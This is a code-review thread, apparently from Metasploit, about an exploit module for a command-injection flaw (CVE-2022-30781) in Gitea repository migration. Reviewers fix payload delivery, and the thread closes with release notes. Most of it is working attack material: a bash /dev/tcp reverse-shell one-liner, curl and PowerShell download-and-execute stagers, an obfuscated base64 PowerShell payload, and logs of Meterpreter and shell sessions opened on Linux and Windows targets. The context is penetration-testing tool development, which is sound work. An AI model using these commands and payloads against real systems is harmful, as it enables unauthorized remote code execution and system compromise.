[*] Using URL: http://192.168.65.104:8080/QLe2cg1
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\mKHvwCHJ.exe http://192.168.65.104:8080/QLe2cg1 & %TEMP%\\mKHvwCHJ.exe & del %TEMP%\\mKHvwCHJ.exe"]
[*] Executing command: powershell.exe -c Invoke-WebRequest -OutFile \\\mKHvwCHJ.exe http://192.168.65.104:8080/QLe2cg1 && \\\mKHvwCHJ.exe && del \\\mKHvwCHJ.exe
[*] Creating repository "sjzRbIG"
[+] Repository created
[*] Migrating repository
[*] Command Stager progress -  93.24% done (138/148 bytes)
[*] Sending stage (200774 bytes) to 192.168.65.21
[*] Meterpreter session 3 opened (192.168.65.104:4444 -> 192.168.65.21:49505) at 2022-11-11 21:13:26 +0700
[*] Successfully cleanup repository 'sjzRbIG'
[*] Successfully cleanup repository 'dnXP3P675dOR1c'

meterpreter >
```
The executable was dropped in the repository directory so removing the repository should be done at `cleanup` method otherwise no session will be created. I'm still confused why your target could understand `%TEMP%` while mind is not. Do you think we should implement this? Like modified the Powershell command if user would choose to use `:win_dropper` target?

> Finally, the `psh_invokewebrequest` `cmdstager`'s flavor needs a local web server to deliver the payload (and probably other flavors need it too).  [...]

2022-11-15 10:26 UTC, cdelafuente-r7 commented
> The executable was dropped in the repository directory so removing the repository should be done at cleanup method otherwise no session will be created. I'm still confused why your target could understand %TEMP% while mind is not. Do you think we should implement this? Like modified the Powershell command if user would choose to use :win_dropper target?

`%TEMP%` can only be expanded by `cmd`, and since Git passes the command to `sh.exe`, it won't work. However, `sh.exe` has a few environment variables set by default, such as `$TEMP`:
```
C:\>"C:\Program Files\Git\usr\bin\sh.exe"
sh-4.4$ set
…
SYSTEMDRIVE=C:
SYSTEMROOT='C:\Windows'
TEMP=/tmp
…
sh-4.4$ echo $TEMP
/tmp
```

As I said, I had to substitute `%TEMP%` with `$TEMP` to make it work. It looks like all the native Windows environment variables are mapped by `sh.exe` this way (`%VAR%` –> `$VAR`). So, it can be interesting to update any potential environment variable in the command.

FYI, this is the substitutions I used during testing:
```diff
      cmd = cmd.gsub(/%(\w+)%/) {"$#{$1}"}.gsub(/&/) {'&&'}.gsub(/\\/) {'\\\\\\'}
```

BTW, I recommend using `gsub` that way, with a block instead of the standard form `gsub(pattern, replacement)`. It will save you a lot of headache with those backslashes (see [this](https://ruby-doc.org/core-3.0.3/String.html#method-i-gsub) for details).

In your solution, `%TEMP%` is completely removed and replaced by a sequence of backslashes:
```
      powershell.exe -c Invoke-WebRequest -OutFile \\\mKHvwCHJ.exe http://192.168.65.104:8080/QLe2cg1 && \\\mKHvwCHJ.exe && del \\\mKHvwCHJ.exe
```
This means the payload will be stored in the root directory (`C:\` if Gitea is installed on the `C:` drive), which will require a privileged user. This doesn't work on my environment and this is the error I got:
```
Invoke-WebRequest : Access to the path 'C:\mKHvwCHJ.exe' is denied.\015
```


> If the module doesn't sleep until the instance variable @payload_delivered is true, then the staged payload will not work because the repository will be removed before the client access our on_request_uri method. It's also take up to 40 minutes to finished with stageless payload but no session was created.

So, this is the big problem here. Your solution is a good idea, but since the web server is threaded it will require implementing complex Thread synchronization with `Mutex` or `Monitor` to avoid any race conditions. For example:
```ruby
  include MonitorMixin
  …

  def execute_command(cmd, _opts = {})
    …
    auth_token = rand_text_alphanumeric(6..15)
    @payload_delivered = false
    @migrate_repo_created = gitea_migrate_repo(@migrate_repo_name, @uid, clone_url, auth_token)

    synchronize do
      @payload_delivered_cond.wait_until { @payload_delivered }
      gitea_remove_repo(repo_path(@repo_name))
      gitea_remove_repo(repo_path(@migrate_repo_name))
      print_status("Successfully cleanup repository '#{@repo_name}' and '#{@migrate_repo_name}'")
    end
    …

  def exploit
    …
    @payload_delivered_cond = new_cond
    …

  def on_request_uri(cli, req)
    …
    when "/api/v1/repos/#{@migrate_repo_path}/pulls?limit=50&page=1&state=all"
      …
      send_response(cli, data.to_json)
      synchronize do
        @payload_delivered = true
        @payload_delivered_cond.broadcast
      end

      …
```
Also, I found out Gitea on linux adds some extra characters (' ./') to each part of the payload being written in the `.b64` temporary file. I have no idea why and this will require a deep investigation to find a way to get around this.

So, that said, I think all of this is not worth the effort, especially if it takes 40 minutes to get the payload ready. A simpler solution would be to not use `bourne` `cmdstager`'s flavor, but use the same kind of flavor set for the Windows dropper: getting the payload by downloading it from a custom web server (`http://<ip>:8080/payloads`). This is exactly what the `curl` and `wget` `cmdstager`s flavors do. Other flavors should be tested too and included to the list, in case `curl` and `wget` are not available on the target. So, I believe, using this would work with big Linux dropper payloads:
```ruby
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ :curl, :wget, … ], # add other compatible flavors to the list here
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
                'CMDSTAGER::URIPATH' => '/payloads'
              }
            }
```
With this you can stay with your previous working implementation, without having to migrate/cleanup each time.

2022-11-15 11:06 UTC, cdelafuente-r7 commented
Also, yes, you can define `datastore['CMDSTAGER::URIPATH']` in `exploit` like this. I would recommend to move this line to the `when :linux_dropper, :win_dropper` block, just before calling `execute_cmdstager`, since only the `cmdstager` uses this option.

2022-11-15 11:08 UTC, cdelafuente-r7 commented on modules/exploits/multi/http/gitea_git_fetch_rce.rb
> +      send_response(cli, exe)
This is not necessary. Let the `cmdstager` HTTP service deal with sending the payload. Everything else can be ignored:
```suggestion
    when datastore['CMDSTAGER::URIPATH']
      super
    end
```

2022-11-15 15:43 UTC, krastanoel commented
> %TEMP% can only be expanded by cmd, and since Git passes the command to sh.exe, it won't work. However, sh.exe has a few environment variables set by default, such as $TEMP

Ah apologize for this my eyes playin tricks on me I have no idea how could I miss the `$` sign. I've implement your `gsub` and works well on my end. Also the `msftidy` fix it a little bit. Thanks.

>            'Linux Dropper',
>            {
>              'Platform' => 'linux',
>              'Arch' => [ARCH_X86, ARCH_X64],
>              'Type' => :linux_dropper,
>              'CmdStagerFlavor' => [ :curl, :wget, … ], # add other compatible flavors to the list here
>              'DefaultOptions' => {
>                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
>              }
>            }
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > set cmdstager::flavor
cmdstager::flavor => auto
msf6 exploit(multi/http/gitea_git_fetch_rce) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > run

[-] Exploit failed: linux/x64/meterpreter_reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
```
Oh this is cool I didn't know that the framework could do this. Learn something new, thanks you!

2022-11-17 11:23 UTC, cdelafuente-r7 commented
Thanks @krastanoel for updating this. Everything looks good to me now. I tested against Gitea 1.16.6 both on Linux (Docker) and Windows. I verified a session is obtained each time. I'll go ahead and land it.

I added a comment to explain why all theses string substitution are needed on Windows. This can be useful information for future Gitea module development. I'll add a commit myself since it is just a comment.

Thanks again for your contribution!

## Example Output

### Gitea 1.16.6 on Linux x64 (docker) - Unix Command target (0)
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > exploit verbose=true lhost=10.0.0.1 rhosts=127.0.0.1 username=gitea_admin password=123456

[+] bash -c '0<&156-;exec 156<>/dev/tcp/10.0.0.1/4444;sh <&156 >&156 2>&156'
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://10.0.0.1:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/
[*] Adding hardcoded uri /api/v1/repos//pulls
[*] Adding hardcoded uri /api/v1/repos//topics
[*] Executing command: bash -c '0<&81-;exec 81<>/dev/tcp/10.0.0.1/4444;sh <&81 >&81 2>&81'
[*] Creating repository "v9uO5XiW2vHnCFO"
[+] Repository created
[*] Migrating repository
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.1:49675) at 2022-11-17 11:53:24 +0100
[*] Server stopped.
[*] Successfully cleanup repository 'v9uO5XiW2vHnCFO'
[*] Successfully cleanup repository '4ryCK0LfKyIfmLZ'

id
uid=1000(git) gid=1000(git) groups=1000(git),1000(git)
uname -a
Linux b4c4dad78839 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 Linux
```


### Gitea 1.16.6 Linux x64 (docker) - Linux Dropper target (1)
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > exploit verbose=true lhost=10.0.0.1 rhosts=127.0.0.1 username=gitea_admin password=123456

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://10.0.0.1:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/
[*] Adding hardcoded uri /api/v1/repos//pulls
[*] Adding hardcoded uri /api/v1/repos//topics
[*] Using URL: http://10.0.0.1:8080/q6CvYv4V0T
[*] Generated command stager: ["curl -so /tmp/hLAqOetk http://10.0.0.1:8080/q6CvYv4V0T;chmod +x /tmp/hLAqOetk;/tmp/hLAqOetk;rm -f /tmp/hLAqOetk"]
[*] Executing command: curl -so /tmp/hLAqOetk http://10.0.0.1:8080/q6CvYv4V0T;chmod +x /tmp/hLAqOetk;/tmp/hLAqOetk;rm -f /tmp/hLAqOetk
[*] Creating repository "zXri2tT"
[+] Repository created
[*] Migrating repository
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Client 10.0.0.1 (curl/7.79.1) requested /q6CvYv4V0T
[*] Sending payload to 10.0.0.1 (curl/7.79.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.0.0.1
[*] Meterpreter session 2 opened (10.0.0.1:4444 -> 10.0.0.1:49715) at 2022-11-17 11:55:01 +0100
[*] Successfully cleanup repository 'zXri2tT'
[*] Successfully cleanup repository '1pwAnQIYG'

meterpreter > getuid
Server username: git
meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > cd /
meterpreter > sysinfo
Computer     : 172.19.0.2
OS           :  (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

### Gitea 1.16.6 on Windows 11 x64 (docker) - Windows Command target (2)
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > exploit verbose=true lhost=10.0.0.1 rhosts=10.0.0.42 username=root password=123456

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://10.0.0.1:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/
[*] Adding hardcoded uri /api/v1/repos//pulls
[*] Adding hardcoded uri /api/v1/repos//topics
[*] Executing command: powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H{1}sIAEkUdmMCA5VVXW8aORR951dcodnNjAIWoKjqRkpVOk1X'+'kbIt6mSbB{1}QU{1}7mE2Ribt'+'T0BlPDf157xfBASdesHGPteHx+fe2wvcsF'+'MJgX8iaZ/i3PGMxQGOk8dsC3YMLiAr7jpf5v/g8xA/2a3xq90hXbQEJsfF/lVMvlb{1}2dc0JybWGFqIxnl2kIERuVYZ02U3O7Iiww73hqpcjv7zqKiuJYbVLZn2UERn1BFV2H5PU2MysT9LIjlakVF2jscTTRnUrwY/Cw3gkuaFqORx1SSodbgBVjJNOfoCH{1}MIyhTsgWE1TLQx3+hO89E2'+'o2KYDmvmMszbVCgspOnyc5+r{1}hTLZHsAY0mN2x97TNmZ7YdTyTaUGXcun7lIupLdNHKGzOG'+'a2MBy3KEJZX9W3QVPqLSe'+'My{1}hm6V/DXm8cQv1B3+MSLDd+/J8OyMDLs9tw+/eKcUUBuFdOXYluDEGi0pxizLhl9Zn5Ke80rXl6NFTmueVGBv8EOWq8zsSFKlhn79XrCwpsJe+BTcWPQ99KmG6cGc77iSBmNUJltkjBr8QXmWUue8mHI+p+xhFkWv0CHj3Cydbd2ksX5DmUDknPe6huvhqO'+'vptNFqmZpttnWczncGp7NZ{1}P6dHQeEj'+'Aa2Pf/2NNh7qVGkVTicGtwagoLJ1Hn9/HycxFdXkZP/k8sJu7fWtHKjYeKOVbJEzkHl'+'QthssOLk2hq3C6cQoHg8dz3hjv2pHbN1qgNMrt'+'a5aYJ3IpbrncrulwbCOIK/MqaklgsDsVRrqQo9CYzdYi5Jg0KL/YgpuRN3wlvSy0FubWUwbDbWG/SaDrlGcW+WbRdVB7rtoyMb/ZpK09MZXFtIJ{1}u/DEjN89e5VrO+SHVJ2dJyLkEhE/Vl02Q1tF0LD+7oiFS7La+zCil6vhKP8gH7l9u11VZbvWuUfdtSm2XGMQyDrHBduYnvSNOw'+'9FgPBj0IDthH0BcIgyNJL51+mN5YLd96LvwpdSmk0PjSa96g2LNGHZUWmr8sit1VokKQRS+qaY+mK+bRvqFfXXsl+OjD70N{1}hm+56Zeo{1}M1zADWCQpAK+BROJgmc2P9C/2vJCg9HZELN0kU/wEkDsnVEAlRKqulgdrBYi3URJ'+'{1}wjVWH0GoOLdscetW3n2MD/y78NzE8d2zbskV+rOV9{1}rpf1S+gvHn+zx1xq9PspjmP1PrUN0zxaiZHr6qXyv9aZ9SNf186/Vv8B8mfhQaoIAAA{0'+'}')-f'=','4')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
[*] Creating repository "4xwu5oepmW"
[+] Repository created
[*] Migrating repository
[*] Powershell session session 3 opened (10.0.0.1:4444 -> 10.0.0.42:52494) at 2022-11-17 12:00:34 +0100
[*] Successfully cleanup repository '4xwu5oepmW'
[*] Successfully cleanup repository 'kdes6vEzCmmEn'


Shell Banner:
Windows PowerShell running as user n00tmeg on DESKTOP-26CQRHP
Copyright (C) Microsoft Corporation. All rights reserved.
-----

PS C:\Users\n00tmeg\Desktop\gitea\data\gitea-repositories\root\kdes6vezcmmen.git> cd\
PS C:\> whoami
n00tmeg
PS C:\> Get-ComputerInfo | select WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer

WindowsProductName              WindowsVersion OsHardwareAbstractionLayer
------------------              -------------- --------------------------
Windows 10 Pro for Workstations 2009           10.0.22000.778
```

### Gitea 1.16.6 on Windows 11 x64 (docker) - Windows Dropper target (3)
```
msf6 exploit(multi/http/gitea_git_fetch_rce) > exploit verbose=true lhost=10.0.0.1 rhosts=10.0.0.42 username=root password=123456

[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://10.0.0.1:8080/
[*] Adding hardcoded uri /api/v1/version
[*] Adding hardcoded uri /api/v1/settings/api
[*] Adding hardcoded uri /api/v1/repos/
[*] Adding hardcoded uri /api/v1/repos//pulls
[*] Adding hardcoded uri /api/v1/repos//topics
[*] Using URL: http://10.0.0.1:8080/Qf2AfITalsV
[*] Generated command stager: ["powershell.exe -c Invoke-WebRequest -OutFile %TEMP%\\iythIKvh.exe http://10.0.0.1:8080/Qf2AfITalsV & %TEMP%\\iythIKvh.exe & del %TEMP%\\iythIKvh.exe"]
[*] Executing command: powershell.exe -c Invoke-WebRequest -OutFile $TEMP\\\iythIKvh.exe http://10.0.0.1:8080/Qf2AfITalsV && $TEMP\\\iythIKvh.exe && del $TEMP\\\iythIKvh.exe
[*] Creating repository "vVuGqD"
[+] Repository created
[*] Migrating repository
[*] Command Stager progress - 100.00% done (150/150 bytes)
[*] Client 10.0.0.42 (Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22000.832) requested /Qf2AfITalsV
[*] Se [...]

2022-11-17 11:23 UTC, cdelafuente-r7 approved these changes

2022-11-17 11:29 UTC, merged

2022-11-17 11:36 UTC, cdelafuente-r7 commented
# Release Notes

This adds an exploit module that leverages a command injection vulnerability in Gitea. Due to an improper escaping of input, it is possible to execute commands on the system abusing the Gitea repository migration process. This vulnerability is identified as CVE-2022-30781 and affects Gitea versions prior to 1.16.7.